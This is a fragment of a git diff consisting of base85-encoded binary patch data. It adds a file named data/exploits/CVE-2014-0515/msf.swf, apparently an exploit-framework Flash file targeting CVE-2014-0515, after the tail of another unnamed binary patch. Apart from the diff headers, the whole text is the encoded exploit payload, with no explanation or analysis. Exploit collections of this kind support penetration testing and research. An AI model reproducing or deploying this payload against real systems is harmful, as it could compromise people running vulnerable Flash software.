zrBVf>7)SwN5S?_rSZ%+_N{Qw3+N`^Z9xtRnZ8X-5%j*>U$RM5qt>bwk6`v|<dd85)
zwftchLI!e4!&J_ffXBG$+Cp4I{xmITa}x!xC>=%>wLm9*0wG>Y!wO?gC{URUPJ-zz
z86$hBIOc}6Gc~jl*lT4ubmB|+aeWrdCzx6aV;Tgb(_F!10$P{~7<nU`C?f`n(}s4~
zNS1}J#G|Zf+8u6Fk$6tOUCcXcB~_BScp6Px$8#zrY(sDNCvy4x<V3N`Ih~wwlo_I(
zT?q|@$W#^-0_$31MX8#lT=gQFNm7oIN?0gDQL{9~hd_538~b%Rw8EZjD%Vh#0CGN;
zE7~(lQ2T_IhjI%^Q=l6a$i8$D;%^eO$hHHF8bePyOcs;Hbf#dP$Q9BUV$K0=LetYg
zkTwcV6QeL&C>rA|SFqg#(UF@j1h=U0V9e}Gc|?eRGFwO=${I;XQwz#z<gMsBbg(=z
zSr}^=1gjn}Ql_J9CfBS{w3s%dhB5%rTv#5DAIimxxp>lmFcjj%A$BHYbczHL9{7XR
zF|(pU8IwA<^!R^Q#7SMzEf_Vr)YY|F>e?KYySv-F<nGN|I^|8#&70&cJsnXQPAxr3
zd$gx#lhWSawRwxw*&Vf*b<TZB<tZD}EK3b_70dfu^({~bUn+}IXS8Q!#Y$LqFEy3a
z-QMX}lod*o(qw5;o2*T?CVP`3;0!b@Z%|xTcVJiG`oR9crvi5{7iE&HSX8Uc?r=7^
zqL<TViOQ<oqdL5*!>2kMRmT;obA#&Gs5*A2Y(RDIR2_q=W4G$K#<rf?uBEE;6Sj?1
z^<1Yq_Nv}}s^bRLHKaOjRNbFc9S2p{O{(u^)wx=AHmlAnRp%Pj8CIRkY_|a6t*T>K
zb?T}!sX7$Zol_kSwQ)jq=T&z>br<cpr%4J^l*W=IGuSy5MOlWAex?%Aj8CwguP#YU
z!fkyGOtdhfC|8zR)>5K|OX~<R_j}g}yDdJdi8dixL$oQ;9un=CXw#y-U9^Wqn-T4}
zXtSc7oI-BXblrLzBUXo_pR6U6T-i_jgwm@-$E^KCB~-G+U`k#SBaAAmVnm{rD`G^Z
z>gpI#s5KZP7HVsW5tZ6))YnfGpF|y$&~-ZrVa^6Sm1RP=Ekxg;7b#=pB88*OMJiKr
z{v3aSJ_mok213rl=rlbRlAlV^YtHgBG)&K($Kf#;10z`>bkC(s{L&Jqmx0sE)aNrf
z{iEQd%Nq4~VTOON$_^)YqfhLFK4>vH22iZ!$ZUlS&1DKSO%`Z`sF$now9*O<2puA?
zhe$$&KN<ck@Ml{%d+r=xpb>f^v~q6HA{7%>-Fl9{3KG3aeQ+AX(Q87YVnX#a62jj=
zd33AL59aur)bk`EHvV&}tCJ7I%voLK|4dV~`1*PNFEqmDq4ha|@?U9)6%#hk6d~vN
z+cYB0Ln|P^pdpHoVT4?yVW7E4eH%c1;Pnmw=S+6*(uh3I-!+MTNkasQt|Y|MjD)|U
zVPN?y>VxAQ|8E)sZEPMJJiiGXytghcp5u41kgTi6=XBe#VnXJ3vl^N2VX#O-(G`9#
z3&S$^G9RRXF6$P4gdJqp0N?=@R_38y0(`y<c!-59^ZcPI;EQFzQ5FG;qgBAe0wD88
zSjYl0SomYivx<WK9<P<<%P0%j?+F%G=b`nrn6~%|Gi?#J&hxJ@VY?@pX@(1Ef~Q!-
zasmmTW?|brv=zc<DuniV{)|a@0;bSHe}#n4vWO}OPqGN`KFNGr%oR_S2_wMn)DpYr
zS%{%eBEar>lifFA3fbL^?EaQT9D?1qSlBVozr}o8O?Ka|uyfAyZ!=%3Ir~DHT^MFx
zV8VZ=S=E1!0g?AdAAtW}Uh>}@_)qxe6*MTkTqqVo-=}6$tiq&V6q+DrhM5X7CV&X|
z@3WeKSNH<+Tn`ZpAaL<H7P5*=03)7ft#it}Plf<%N3CAP@k!`VLco2Eg+d^Q;&F-L
z8!!ZyBEz-buP-i|41df*PBXP+{uAceQ(j5tKV_{Y2_caNbB#_ykVNJeSnID@Ed<{1
zO~{)S=^%K20;_yuaS`x;js{Q^D0u%=F#xI^#DZYzj#U9_bGZy8WZ-s=|68pYEc|VT
zS_(5*_%Esp!2<uzTDjX45=sCh#DAEYBhgy#_e@nS{M{v075*OcgqMu^pDc70>T}-Y
zQC3Ic|FyIV60G(90Mt?V`z*9^4m7f0;hZ)-8baYA2`<uBR1NkQ{u_3Xl+@Sx2ao_@
zjz#8ykhPuH<xy!=8KV3ysr8rA4ysX@;&)3aC>LkV!96&j=QPScE9vs&(YrB}fI-N5
z()*po#q<0=36@u7FzB7;@>gLj!FG0$u17&Y2L7Ogc_;ISBuJyz`4=V604$G%b<_$W
zaRm%?MYmjW?`vm)`NOc}`N{Q1i?5Gb&!y<3MmrRX_eYD1{1G7na(Yy7(&e+jEM+_C
zeQt3Ps=d{68DS6FO*z_7gykqq1m%dLE!xq|9q8dstovP9^1HF*Z?ZwN*$&MX2Q)oS
zXnGr<X>~!f)eX(n9%#0Cq3QEMv%L|Tem^v^Wh9u8gNbFqgdKEhH1`fyi2N`_UV{lM
z53El3`SR5Xbz#)bn>7c&Vqp&%btV`1s#HVD6{9J4%Cm9LpqJie-Jn@{5UAXIHM9*Q
zJ|0T>CXbHzHfX+4A8!rOQ@qs&X9a%cZoZ)n%P`*<YAGf>Jd93G1bCYuk9bz1T?4us
zoGgQr+d~vx%sX^9`q8bsA%G$$y>EbJy97yh9SPq&M0JlK*-}f=ZIbi~lC7RVc@@45
z!$xc5eYMD2PkMg}{QFx=GN=^uKwt=&_&|v14I%dQaoG7=OH6Cj-FzqPtbnykZ$JSX
zgn+S=-tR-w@N2JikWv4Ul0V_oef$%xZ&7X8Xn<drTE6kX;0jpzIewkb0U77xds|O5
z4qisr!Q+0AXc@o3a{`tfY2riIHjz>jhVTMEXfo6;=QnzwMlD2dA?p(>)<-vt(`J5)
zQ0~^MxFac=Y6Lk?@ew@7fUxmm!sUT&pX;^y-YUcuk|*aM<w;)?AP008Po=<^Vn+&*
zQ=(1^2>OPPnT8%*N!Rfkpne~K+(w!V(u5l{Dn{diI^oy-{Eo0IMH4o7%7+2vSV%gi
z+W^ha3+7lprhCBEMWMzN?)!*513)*}yZFPid^QYK3a*+waF*hqE~~(&)_PwBcl`;_
zsX*`<K@gIG2BhYn@vR4K{QS<490vCARDu%@urx8Opdgz&J_ox39CkiSML1gcy+8|I
zy^ngJnAvoT?jC98_tR^e2}t+=ke8zoFhcz&G0_)vKOANrq=Q$$Ht7^2-N_%Kp`f`t
zc=;FT+Np#?ckrXscNrxn!NYWL6@v^|rZ3}v28)8CufgLZP{80ZVO`*l(y%w;8Vn+q
z-6VPprUqBT`KNI~xAQ-zgDns^e*QQOspmpuPH6dM3P&NUczgo*ww8k8`7eO6-U$1n
zMk_Kti8AUc?u%>Wb^N%g`cu@iqO3aqD#$VzBJ21wHJU#qH2*QU-Os-UE9;G5nt7A>
z*&5=nSBOv55I<WXt_bnhLI^KPu$vy2pO^neCauH<2Y-TRVmR6pwPhh{kkJj%(T&m3
zaCEdSIvR<Nu3sO$nKX;v*gC*G?YANgkc`hn;7Y-W>>11$GqD0(>kzzhgrAM<*ws6n
zG^U2T+GdAS_#!`@%O5Tb!<7+Uk`=0R;!19OW*9kbt#X3*+UD^YxZKVgz17*8rPMOi
zUWI<x%QwDv%k7<=Q5KLHrIJb&n}QoVDghnz)IwD&rSQ6ib8z&b@CHK(d=j9Ng!W-D
z#XPWyFurDl1#c!}lsknr)*%uQRjjdeIZ<bkWr2z|^>Fpzt^-4R_U&C?^F2YsD@<{(
zFD~m+VBH9ChYLC*pVcysuC`5Z#oW;ech+R^_p)=n3}EZl-z{CF9?>#X%)^!IN7-5G
z?(D8{NySU9dPcSPHr3ml^2O#y-VVr}ojp;xV@pqu3NN5iKnXMi+$+FgvQ=eFm8>==
zRb`i|cx*1JN?vd;zCx?;rx3|T?G7KcH$v~HvSPDP2zz+L9i&VK?;{(0bA?+4Xk^8;
z5QSqf@!du@%3~M>lv2gwdB?&(1(9Ikx5AFihs)6+uNHH=M=T?1N{x;vDMd7xJYzCo
zo8fW<V+DTVidNi<Rg%V6b5}+#F<8ZpWfN6xR%=OR*SKyZErr}<K4DnL)8odCvlE6x
zPiM9KY#hFJXe+ep7nw*dQ8bESxHmVn@egz9(!JG9f8cv7p*db&wRg750Z7b%N)(k+
zm0^0Sk_Gc}>Bp>0-0(1$+v9~q#LNVDfj`h)kfS&dbqvxJl6fHto&mpLRg(jvs!7pN
zIXcS9#Y}kfwEqWyQk%QuGx186RlH&u_`Nc$h7)K>D*kiS%>N%!UJ6K7g)kLwA+RV3
z)nT7zP>LZYnTn@d5nzkU?u0jXGseD(-O~;-kcZn(xI>34-Z>|J!-6jf38Qv8sLuxX
z8<5<=>x{x-_<E5gb58i`kj&)?nX{HZhyvR=XU$i@Iu2pD;e`4`jzPi@XMEozd<n_r
zlQ2e+@p_pYr|_ZXAbwUL+e-w8+Kf3Ic$AP%iM&W*nvv)F8S(TtGjc`(FTff79T<~l
zO5T&m<>a^ucdOcDrf8DJ=0Hiu79iZQV*q|T;TMD74*30V#$7;;%YNK{Y==Ka9BhL4
z!{5jK$9DK*#KG~piZ1H(Q$&XE<m4EfiHJK{C=$3GhJQ*Zkq$;mgCvN3|KER?kPeBI
zwik-ufxiFm{<3>J^ua!}_uzc9Ok~{0n-%gN{9^!-V2r1+TDmfRuuL!LfPb*OjtAEP
z`ZFj3d@eZy+XI2Ep<RJ7+{kqye^><IoJi0kyb0jAb%=FveTir|4`+T&$RpsRf?hV^
zK<7btg}>N(P>${QrBbk-2UI5#B0-P#VB|%#L+};T9v&et+GFG!VYJ6-Q_tXbv-jZq
zN7|!ISH=&P=>;8JPL;$u3hBpnz#eeZDC{BZfc8;9zZQkObg4biPEFD!_5ged?IC($
zAD{<&O5~-oJ=)9m5_Uv;BR<$s*awcs!XF`ttVTPV^B_-k-i!0=As%2?hpoF*0<(SS
z7H`HwXD9IKNBO~z{S`aoW37Kt@88l#F6$$DQ=dva$S7Yq9{#`Nzx0T*yb+J5H7ES?
NaUZoJ{{zmB|L_W;W}*N9

diff --git a/data/exploits/CVE-2014-0515/msf.swf b/data/exploits/CVE-2014-0515/msf.swf
new file mode 100644
index 0000000000000000000000000000000000000000..06505fbe4baf63c80bb00ff2d8675c02f1111274
GIT binary patch
literal 21561
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
